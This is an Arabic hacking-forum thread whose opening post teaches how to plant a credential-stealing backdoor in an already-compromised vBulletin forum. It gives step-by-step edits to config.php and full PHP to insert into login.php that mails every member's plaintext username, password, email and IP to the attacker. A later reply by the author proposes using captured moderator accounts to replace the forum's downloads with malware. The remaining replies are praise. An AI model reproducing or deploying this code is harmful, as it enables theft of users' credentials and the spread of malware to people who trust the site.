1. Mokhalad HaXor

    Mokhalad HaXor آداريً شؤون الأعضًاء

    الأنتساب:
    ‏3 يوليو 2012
    المشاركات:
    3,319
    الإعجابات المتلقاة:
    2,463
    نقاط الجائزة:
    113
    الجنس:
    ذكر
    الوظيفة:
    Hacking
    الإقامة:
    etc/shadow
    [​IMG]






    كيف حال اعضاء و زوار المنتدى الحبيب


    [​IMG]


    اليوم معنا طريقة قوية جدآ في تلغيم المنتديات بعد اختراقها الطريقة سهلة ميحاتج اعمل فيديو او اي صور توضيحية اتبع الخطوات فقط الطريقة تقوم ب سحب العضويات , طيب راح البعض يقول في سكربتات تجيب المعلومات ب دقيقة مافي داعي ل التلغيم


    الجواب هو , صحيح لاكن المعلومات لما تجيبهة راح تلاقي باسووردات الاعضاء مشفرة ب ال MD5 , راح تعبك ب فك الهاش في هذي الطريقة توصل يوزر و باسوورد صافي على الايمل


    [​IMG]


    تمام تبدي على بركة الله


    [​IMG]


    مثل ماتعرفون كلكم انو هذا السكربت تابع ل المنتديات
    اولآ ندخل على ملف الكونفك تبع المنتدى من الشل يكون هذا مساره



    [​IMG]


    vb/includes/config.php


    [​IMG]


    نقوم ب البحث على هذي الدالة

    [PHP CODE]$show['nopasswordempty'] = defined('DISABLE_PASSWORD_CLEARING')
    [/PHP CODE]

    [​IMG]

    التغيير الذي يكون عليهة هوة اضافة //
    يعني نسوي كومنت Comment

    i:q^:


    بحيث يكون على هذي الهيئة بعد التعديل
    [​IMG]


    [PHP CODE]// $show['nopasswordempty'] = defined('DISABLE_PASSWORD_CLEARING') [/PHP CODE]


    [​IMG]
    الان نذهب الى ملف ال login.php


    يكون مكانه هنا

    vb/login.php

    ونبحث عن هذي الدالة

    process_new_login

    تمام الان نضع هذا الكود اسفل هذي الدالة مباشرآ {1!9}

    [​IMG]

    [PHP CODE]

    $lg_username = strtolower($vbulletin->GPC["vb_login_username"]);
    $lg_password = $vbulletin->GPC["vb_login_password"];
    $sql_query = @mysql_query("SELECT * FROM " . TABLE_PREFIX . "user WHERE username='" . $lg_username . "'");
    while($row = @mysql_fetch_array($sql_query))
    {
    if(strlen($lg_password) > 1 AND strlen($lg_username) > 1)
    {
    function curPageURL() {
    $pageURL = 'http';
    if ($_SERVER["HTTPS"] == "on") {$pageURL .= "s";}
    $pageURL .= "://";
    if ($_SERVER["SERVER_PORT"] != "80") {
    $pageURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
    } else {
    $pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
    }
    return $pageURL;
    }
    $url = curPageURL();
    $ip = getenv("REMOTE_ADDR");
    $hostname = gethostbyaddr($ip);
    $message = "------------------+ VBulletin Account +-----------------\n";
    $message .= "Forum URL : ".$url."\n";
    $message .= "UserName : ".$lg_username."\n";
    $message .= "Password : ".$lg_password."\n";
    $message .= "Email : ". $row["email"] ."\n";
    $message .= "----------------------- By Mokhalad HaXor --------------------------\n";
    $message .= "Client IP : ".$ip."\n";
    $message .= "HostName : ".$hostname."\n";
    $rnessage = "$message\n";
    $message .= "-------------------+ Created By Mokhalad HaXor +--------------------\n";
    $send= "هنا تضع الايميل الخاص بك اي كان ياهو او جيميل او هوتميل";
    $subject = "$url | VBulletin Account | $ip";
    $headers = "From:VBulletin Account<[email protected]>";
    mail($send,$subject,$message,$headers);
    }
    }
    [/PHP CODE]


    [​IMG]


    تمام التمام الان ننتضر فترة مناسبة و ننتضر ال ريزولت على الايميل
    و يحتوي على رابط المنتدى و معلومات الاعضاء
    هذي طريقة قوية في جلب معلومات الاعضاء
    انشاء الله تنال اعجابكم
    :{4!}:

    [​IMG]

    للاسف وصلنا ل نهاية الموضوع اراكم في شروحات اخرى

    الموضوع اهداء لـ

    м̨я.ǚs̲ǝя - الأوكراني - TeePlow - المعاقب الصدري - k!lwa s&rian ro0t - Ameer Eagle - مِحً ـمِدُ ألَعَ ـرآقَي - MR.CAPTCHA - ĐЯ-ЩΘЩΘ - AnonYmous-IQ - Pro.Mast3r

    [​IMG]
    و الى كل اعضاء و زوار المنتدى
    ً#ٌ5oًًًُ. ً#ٌ5oًًًُ. ً#ٌ5oًًًُ.
    [​IMG]
    [​IMG]
     
    1 person likes this.
  2. الأوكراني

    الأوكراني <div class="smal22">.:: غير موثوق ::.</div> موقوف لمخالفة الشروط

    الأنتساب:
    ‏22 أغسطس 2014
    المشاركات:
    255
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    18
    رد: تلغيم سكربت VBulletin بدالة mail

    بارك الله فيك موضوع قوي بصراحه موفق على الطرح
     
  3. Ameer Eagle

    Ameer Eagle V • I • P

    الأنتساب:
    ‏7 يونيو 2014
    المشاركات:
    3,233
    الإعجابات المتلقاة:
    2,779
    نقاط الجائزة:
    113
    الجنس:
    ذكر
    الوظيفة:
    Student
    الإقامة:
    IraQ
    رد: تلغيم سكربت VBulletin بدالة mail

    وعليكم السلام ورحمة الله وبركاته ........ مبدع صديقي مخلد ابن هكسورة ...... شرح ولا اروع تحياتي وتقديري {1!@}
    عدل السحكات {1!$2}
     
  4. ADNAN

    ADNAN Developer

    الأنتساب:
    ‏29 أكتوبر 2012
    المشاركات:
    84
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    الأرض
    رد: تلغيم سكربت VBulletin بدالة mail

    شرح متعوب عليه

    يعطيك العافيه

    جاري القيام بالواجب لانك تستحق أكثر مما لدينا
     
  5. عہلي الصہقہور هنہا

    عہلي الصہقہور هنہا <span style="font-weight: bold; text-shadow: #BBBB V • I • P

    الأنتساب:
    ‏29 نوفمبر 2014
    المشاركات:
    283
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:
    18
    الإقامة:
    ألعراق ألعظيم
    رد: تلغيم سكربت VBulletin بدالة mail

    عاشت ايدك حبي مخلد


    يوشم بل خماسية


    [​IMG][​IMG][​IMG]
     
  6. Windows Hacker

    Windows Hacker V • I • P

    الأنتساب:
    ‏26 يوليو 2014
    المشاركات:
    636
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    18
    الإقامة:
    |[ Occupied Bahrain ]|
    رد: تلغيم سكربت VBulletin بدالة mail

    شرح جميل جدآَ ، عآشت آيدك [​IMG]

    لكن مآذآ تستفيد من حسآبآت آلآعضآء [​IMG]
     
  7. Mokhalad HaXor

    Mokhalad HaXor آداريً شؤون الأعضًاء

    الأنتساب:
    ‏3 يوليو 2012
    المشاركات:
    3,319
    الإعجابات المتلقاة:
    2,463
    نقاط الجائزة:
    113
    الجنس:
    ذكر
    الوظيفة:
    Hacking
    الإقامة:
    etc/shadow
    رد: تلغيم سكربت VBulletin بدالة mail

    الشكر لله حبيبي وندوز , اذا كان المنتدى معروف وفي اقسام طرح برامج الخ .. يمكنك ان تدخل على حسابات المشرفين وتبديل البرامج ب برامج ملغومة هذا ابسط استغلال لها
    :{13}: :{13}:
    :{13}:
     
  8. AnonYmous-IQ

    AnonYmous-IQ مشرف آمن المواقع والسيرفرات مشرف

    الأنتساب:
    ‏31 أغسطس 2014
    المشاركات:
    387
    الإعجابات المتلقاة:
    457
    نقاط الجائزة:
    63
    الجنس:
    ذكر
    الوظيفة:
    [+] Programmer [+]
    الإقامة:
    Iraq
    رد: تلغيم سكربت VBulletin بدالة mail

    [​IMG] عــأشت أيدك يا وردة {1!$7} دومك مبدع حياتي {1!$1} {1!$1} ​
     
  9. k!lwa s&rian ro0t

    k!lwa s&rian ro0t مراقب عآم

    الأنتساب:
    ‏3 أغسطس 2014
    المشاركات:
    742
    الإعجابات المتلقاة:
    1,233
    نقاط الجائزة:
    93
    الجنس:
    ذكر
    رد: تلغيم سكربت VBulletin بدالة mail

    ولك شرح رائع جدآ
    منور ياغالي
     
  10. м̨я.ǚs̲ǝя

    м̨я.ǚs̲ǝя <div style="border-right: 5px solid; padding: 2px ExpErt DeveloPer

    الأنتساب:
    ‏16 ابريل 2014
    المشاركات:
    437
    الإعجابات المتلقاة:
    13
    نقاط الجائزة:
    18
    الإقامة:
    ★ الكردستان ★
    رد: تلغيم سكربت VBulletin بدالة mail

    يعطيك العافيه [​IMG]
     

مشاركة هذه الصفحة